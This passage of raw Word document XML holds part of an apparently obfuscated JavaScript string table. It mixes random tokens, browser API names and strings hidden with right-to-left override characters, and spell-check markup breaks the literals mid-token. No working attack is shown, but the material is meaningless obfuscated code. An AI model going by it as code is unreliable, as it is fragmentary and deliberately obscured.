        <w:t>8bPkIz1UMME68eFDJGhmSQLSGm4w10DVNwfgADLwBa6L9VaYtlgtbvvTTEj-TbYqLCdFuD9Pl9WbHLdlCDYL2e6Jddcup53VCddHqJti9VWTSkoSVPqjTouQb8BmVQOJ4h-BKaTyl9K9uYlAz-CHNAP_REUinjMpTRRAbdnfGxQuEvzDLdefSAf6OjzOOv8SdDDr33k74hbqfGy6GGY9LEHC0uvx8eeG3GY65Wbsrb5xzLVecFANRxD1lcPAshwGcWWo9B-t9zwXjJnOZexxrPzR3Z4tL0Yer6oPG7Ki-GKma-PlvMDUPUt8uw8W1e9aHMwIBkKLbmdf-y4Oi7YczmbdIKRJXr2DGDNEbSQuPkrphOyW5mR9DIVIJCBb8JTt6ny0btpkAa39uyTABQhxFnT6dQgtj3_kAfpPFNpo_H-lERljVtG_kOTCKmB6lROD_wtXgctUru_wEQYhNr8Tw43r_ifky3Sz882iU9y6TAPuuCVf1p56fM0nD-g9ntvv1QQb5w-bUBBQpxOtzBLGbA_a032QLRUaJepBtDD1KP89JYc_N17XFxTGjaD_NeF2uorXGY3CAVvzZb7yVNh3vrc_-ssT7pRfeOtwmzJhHGIrvo5GZ8KoKghefXn2uYJ99jxY68puAZgNQ16pyZhh4cR6a7ghuno6_cC33h7W9b35F__X5QVNum3AvxfdeDT3DoiUyXugJtz6MWlkIeZyAvC0PD5mbUuT50w4Nj3MIiCayK-mFJarsjYxvQVf6oqFsXKj2LdqUjYGYQTEvgcAzhfAhJ_muopeA7G4pn26jFqbAMV5coUy0Rz5f2t4uJcRBFsrlVIIpfv9kgSUYxgNeBrzU8aYXv56rHolCIwz0Kf0nZimohPsMp6CvjPLPq1z4C-kjbhepd40Bvq5wKyPddQAcfYnfXW2y7fXmnohTV90fa1N1vfcqlQ6euUs-OJ2d-Q8qb-vPQSdCRlJSPIg9Wf38dWzBenUOMm5rhhRGHs5RSMYoVxhq02IOaN6mnM_7lWxGMMjpZ7eRg-X4_LMOoOkLrqCbW9yGXdk7SSZ0BVR7BVfXKBclRQzVxtOkfvEjQnO1i9fvSxozWtvkFS054Yt8k_7xvN0BZyvCy6_EP5d8wQN29wc2U6GRD_Wn-rVGIRqmhaegdWrHvWL2w2mDUK_LP4bcZpwezKU0R7-svCNHvDaroEgHSedqdhV2M7z3v33a4OmEKwoWvOHwB4XSsGB_W5Rejd02D9GGLEX6k36cKDV1BfVfG6ImHr0iGc3kbaC-VFIjMPVT3M5CtnyKQpCRje9v-mw1Oi1lxCR6ia29ivq1KwOsDfrbtyhKMZS4IGm1lb9P9uk5rZMBdfakwBsiWDiZoMGdJhtHg9R9WittEcMrn6Zd1HSyYhBCSwtVPT5Iqaaio5c_oVc0xMKmHydDAqsBMmhrgIe3rT5lJ3iUtJDsa-hDBHKkmNU_IDBHf8HutQc2MEbKJhHJyAqyruEHlX_tEx4ZsYgQ7DqW6Vt0EJh770gN32phS_XF3zGciqVfESdomxzJPQUyjcbkODRbOj3ujZrJgfb8BYwMyPS8r0rAs7REEKN_dyqhX8xzpQkHcSn-5ec8WMwYxnQ7RjPFcokahSMs", "86Nj5Ta3s1-X", "cn0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nrtt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-xo", "ZagTqByrx1Lylj8", "j9V_xjqBsEvXwhc", "reduce", "98hJjjKUkhiB_GAaQe4", "FvtZmCmEuEj4_SVKTPE", "kd19yQWE_ECOphEpbJv-TjS8", "A609-Q", "Math", "EcI", "No9grwyC-Hw", "QTqEWP5kLboKVKI", "CBebbM1vVqMWRp0", "Om6mD9N8Nqp3", "01S_F50", "LGXcZ7klEfdxcqfZhBZJ57R8RwZI8FnLEYehmklGnmeqqEETUERzfPhzzVanwJ-3R0uiWX8", "DGHjEqQEN8tMS8nn8zsgna8FO256m1qYMqeBvV9s2k_h9GVrKF9uLNMjtiSmlPfCJCGWQB2-YLrQBP7qGg", "s2DOKqJ2LNpSbLjb6Q", "7yaZQ-dKf64NOOOqjzcU9bw1Pxtp3TL1Jw", "b4kxuRzq4Q", "E7g54Veq", "X0m6B9lWcg", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"8CbDWbwGDs0PML2m31oTg9l8ChMUmyv6Tg", "myiqL8NKeI8", "sqVK2VmRngo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LEPSOpMJIutz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "5eQD7FHy7S0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ryDNGaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "abs", "LlapLcJHVJ4", "b5tYwCKY02yp", "-2\u202EYuuMIdcQn\u202D", "kTTwJIsjFM1BQN3SvV8x3ZEzW2VC9g", "children", "NcYMjG_z7Db-zzBMKNI", "function", "zpE_n1Lj-gbapRI", "O2jeQqpFF_gxLaU", "U8MfsWXI8iWXiAM-Q-XLSzE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QFi-NdhjDg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XtdalXyujU_S_WIeIK-LdRz68Y7vTeZ53w", "8CSDbPptaacjeaL2", "haIY4VnkwjqI5AQzBtKFEkfi", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GVyTGg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6TzFK6c6bfctcqq5yEkPrMlzVxBZ-zn_Xcbk2klXu2TNxVlLBgVSUb5J1xP5jM3qQ0r0WC2dBtq1KsHEeqIgHw", "match", "C6Ur43rm3x3Zzlc", "2cB87miNhgI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "E61hywjqlA", "PGDNZ5kZB9x-cd7B3wM", "interactive", "y-5C10uBjhfKlnQ", "qbo51XzQ7g", "min", "-5gc1WfC13uprj5JDbmI", "SapNkz-f726EjWA4HuHZ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setPrototypeOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "any", "bst0jze6qXak", "detail", "sJxGyV-Jrln7xRZrTIk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TGc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ltltkQ-Hv0XJvUtSfw", "ga003CvjqGvbtxhCRfymCGk", "f_cbvHb23A", "PXKyBN04FpxiMM_k2xVm_Lo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XQbKHoYdVg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "34teyWz0zAncqDI-R4nPMQ", "-2HzdoQ3Rto", "18h2ggX1hQ", "l3Q", "pEv2LuA", "hidden", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "lc4PomaMvQLRkWl1YabaTQ2V", "Cc9MkDePkCDp-Hsa", "JmGAKOt8HahlOPXc", "51v1cdk4IqtFDcmJvjQ4gLxSfHVt6U6QG9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Y0C4aJ1pDIVwTw", "9wL2cYgyBvghEJOP0W47qP9PKDA", "r-5wg2my_z6q8UkbGa30VDyjoY7DXqo", "CBf9e4QtYdpJVcq8_zEqkdpcM3hi4QjLVLqz90YC5kn48A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dTqqeMg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4mOqd-RPOKtLftSjjn4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dispatchEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "RYx31QOB8Vmn2lZ8AeyeL0ut8LqObLl-xFMEB_X5PQ", "Go0q-wuE2g", "2F6XC-5FRK1xObi9mXVTvf0rJwoGhmavct-1wi1k-HzDzy4Pd1MaLsRU42HJ", "BNVs1Fs", "Mwy8QvpJbbRxHA", "NuJm2w-rznLE2FgOBw", "nNt9yxSC9lLJjlQxL7HlSh_HsuzhTvIy93stYrG_E40", "8SKXD_IcSbFu", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9UxxU_H2GfWxwcjdb3oWzyDz-7bRtQL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XlI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "undefined", "13n0cKc6Rg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "catch", "substring", "zMNB_D-0m2z1", "SQHWQ9YcNtkvUYD20A", "sSWXbu91QvQ", "6jOVSIYxaLI0QoT41Q", "3BmUVo0", "DSzWeIIucOoqQtf66ngjt_hcZHc7", "wgS4aOITMI8", "6CDMVI4J", "mFDRVo87P69HdPflwA", "6xH3fpwrDO8tSd7p1TRY3bw", "round", "qjHRb7EhCuouLbmemG4I", "1mbfdvRKW95hVcvTgw", "n7cFjhHJ", "bwezb85xX88uNIQ", "aCWAEOE8PKVEZ50", "N12RKORyAJZ8a7w", "Yz_6d58EBuYUMs6H1T5J", "BgPYJ6Y6ZesuEA", "u3bSQL0jY-5bKPit", "A_pC8TPO4Q", "AoYVxSLsgGv5oSEtLtKedXnj-MydDuI8gBIeWNnfWO9tS7HY9q7dkz-Ye8lFHVdg7N8juPJN3Cdg", "Lqxf9AejoG-JszY9Hw", "bubbles", "itNNjzOd5Ejuvi5NB4evcziH88L1D8xi", "xIlL9jjTtXPn-nJD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MrFDizWMug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "set", "3gndOKZWXQ", "nK8S41H1wRrOthsMC-Y", "IDO0B9ljfYUUBqis", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mIBGnSifzGSilXcjSoPZdCOpkoI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8rIb", "string", "IccYhRvZ23XqiiA", "VBXsU7EKRN07BdTZkCQ", "bot1_wW-", "g1CpCKFQHfMZUOE", "mXD4XowgNdVMQ5T-hwh635dX", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qwKQB_RHKZs6KLbRhA", "2mDqPIY3QclPFoT2kCwy04o", "0-hpvR6lt1k", "80-FQcY", "e36hKtR3e5dRC5-HpUggh91YHDgnsRifTuiD9V5exVv_vAk0QSAsE_Ro1FfoqOSHahGNYHE", "N6olrgr0lB-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ty0hjXvKwEV7XsLeLP5pdyn4","dlj3dw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>documentMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6WKucs1gKJY", "now", "dU72BJJ9ag", "xJse7EH3yUqN6CM8D9aO", "dzzFU9oze6Nq", "enumerable", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Odcu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "m4s_okyj-zbMzGhXZu2hFyWDg-XnYJR0", "xbUA033UyVk", "map", "^(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--zn7c)?$|%", "Float64Array", "2Ngz8lLmwiz5gmI", "554", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ktg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "empty", "8d9TliOP62HwtCBTD4iSfS-Q29r8EdJ3x1kGMPSBT5JoD4T85_HNywvQLPEK", "kAvaOK1sXPk6", "Z4EEzXCVzQ", "4jj-K5c7dcMFGd6e", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kphz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6xiUDfhKSw", "4x7mf58AatwrQ8_G1WMBig", "bphlzxG3_W2z_xoTBuSrPG_v", "oUfPBKsXB6JqYfaUxXBH5ul8", "pDWJHKp6IaE", "UkuVIPh_BYVVNIKZ8x9s1qhTBkE", "B7Yo7Rnd9A7qnUIzBZi-HVqb3OrD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HLw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "OVG0Lstxebp4R8rRqC1k9K4LfWRq_0mNNcjuqDQu4knh4Q4IFFxrMbRKowCj-tLS", "Proxy", "true", "Date", "6hioIA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GKRmxg_vmQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bind", "type", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "J0jGLJIlC_hQDMHtzx1d150rJA", "oC2SEb1_dbYgLamw41gGoP58SFsZmXfvP5rC2A", "xnSyZOR6KKBSUZ2lkFk2gw", "cNNy9x650BDKkAw", "1Z0krxE", "LE7bbrIdH-ph", "sdBjmya8uQ", "DGbCU7odffA3K_G41Xxe4fVYNB4_wBK-Mdf_-wdisF3ImnZGUytNGIo", "yT7BdJ1yftgQ", "YybrIosOaPsQIK_x7y0B7b87b39gyH6tZ8Gz_lhc5w", "zEf1N9cBMMBtbbTQ1nRQr41CNx01yyo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "l1SBJ-1qbKt4ft3u0Q", "Y07pRNkLHsY6Spw", "YrERg2Shwxfz_WM2HsE", "Int8Array", "wt9XkzSClCw", "eNNRzjWL_1jf21Y_W--8CVrV_IjjEJUe3Ho", "-zzifIY5L54CWdaCpDZjxtMcfhAurxWSGf7T1SJmnBzrv1dhQBV9fvtexzirz6TJaCrD", "6JFR7S6f5G26vHgUGPSVOw", "_xf-ZakBINkEJoGqw1sS", "GH-Oe8N9R5ViHA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoJiqQjwzAo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "value", "ZVzfVL0cce5gKO31iBNf6bU_XRxVw2uqPYeQ00sPsDGAjjctY2UNHoxmqmWfx4D4CWOkSEaGC9vmPIKLPIRg", "Va8i20HK8TaJ2BgtIuqxNmLC0a3vV5FJ7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zWOBGIo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hIJQjzqBz2ytv3k", "clf_Z5E6UYZBHYA", "0rYCgX3LvSag431lFcnEayep0Ys", "XSPlU_8KUaVVDu6S", "x6Y-9G0", "g4VFzS7PmDCn4A", "AVy4PeBqZKY", "0I1PjSaKkk229ShlWJjnaCKxxPv7U_lU9xJgDK-gHdM", "BB74cYwWE-QjOsWJ0SA", "o7Ee", "top", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRnkcPcsOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1GbiAJtBWqkfQA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE", "S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns", "moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", "OzPkPYcre9wUB4M","3R3Fd60_Le0", "t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ui-LBOVPP7oye-I", "bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMUo9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bRXfAek5TuIuIJLp5hpP8g", "sewV-3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", "Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA", "b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hOMAhxnR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vudW9iKdnnHP5EhUVKk", "rvJR4iKdknDm-lhe", "HGqrYtxvCP4eZg", "4VeHQuBOObdOa_2snn9etvZwNz90hiSgadXip31y_ALfnXtLHxkPWJ5X91yPv9m-SQn2DlHtS7X0JdqUaNpxZ4IpQB-nvr13ndY", "Fx6vQONA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avlkzCCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PbgS80ewlGrbkwRXVOqvFw6n8MA", "OHO5JA", "UbEj5gXXkVffnBZSXeirBlnAzvynO9gKt21tZv__f5xcfcLqhZPhrkGlTf13Om1F2qwZhdV76BFB2AIo727X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", "aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74869001" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve"> "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4-Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tkPwPo4mKI9qddij8FZr", "rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "crypto", "FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", "WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg", "69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw", "QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", "1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", "yUzBcMZgUZBaQN2q5A", "4Tm4CsRXdJo", "9vZGkkSXjVLK7A", "bg2YX-IQYtR5WcCcjg", "E6x89AWoySk", "wVfvOJ8oPL1jT8HG7lx7jg", "jBX7LZ8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eyWpS_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-JA", "LRL1WoYUTLN-KKCntw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRezIthr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xbwz3UDU50eZ1B0hNvCuA2XE5_6rEo1O9XIXOY-qEMcmFbCqsMOHpBX0YrhDQnxk4_ZTjdc_u21L33I8xkjQ7lXtj7Y2", "5UaZQPRQbJY", "OzenP8F0E48JCpDrty5q1I0DPV4i_E_DCaaO_1srlQ", "ywKZetd3V7g7AK6g-Q", "P0vSPq84BfY", "J6Uo6EM", "seUw8TTKsi7xxgtM", "9waqGL0dYsJJO4OK", "EalE9xm4xG6dyGVZNMihCWmSyYI", "rfoqnFTA1QLClkwGboTvXQvatPHgVMNIqWgGQNmhaNAEDfX18s6HsFiqcaA", "Element", "V5lDty3u6XKgq1k0BbSOGQ", "llvbYfReRMNkHZmVt2wVj9k7Hg", "</w:t>
      </w:r>
